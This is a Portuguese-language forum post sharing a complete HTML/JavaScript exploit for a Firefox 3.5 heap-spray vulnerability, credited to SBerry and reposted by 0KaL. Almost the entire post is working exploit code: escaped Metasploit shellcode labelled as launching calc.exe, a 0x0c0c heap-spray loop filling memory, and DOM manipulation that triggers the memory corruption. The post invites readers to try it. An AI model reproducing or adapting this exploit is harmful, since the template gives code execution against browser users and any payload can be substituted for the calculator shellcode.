O código abaixo, se salvo como HTML e acessado pelo FireFox 3.5 ou Mantra Security Toolkit na mesma versão (e outros navegadores baseados em FF), gera um estouro de pilha, fazendo aparecer aquela famosa janelinha do "Mozilla Crash Reporter".
Brinquem direito !!!
Até a próxima!
Código HTML:
<html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Vulnerabilty </br> Author: SBerry aka Simon Berry-Byrne - Posted by 0KaL </br> Thanks to HD Moore for the insight and Metasploit for the payload <div id="content"> <p> <FONT> </FONT> </p> <p> <FONT>Loremipsumdoloregkuw</FONT></p> <p> <FONT>Loremipsumdoloregkuwiert</FONT> </p> <p> <FONT>Loremikdkw </FONT> </p> </div> <script language=JavaScript> /* Calc.exe */ var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); /* Heap Spray Code */ oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = document.getElementById("content") if (document.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html> <html><body></body></html>
Até a próxima!
Comment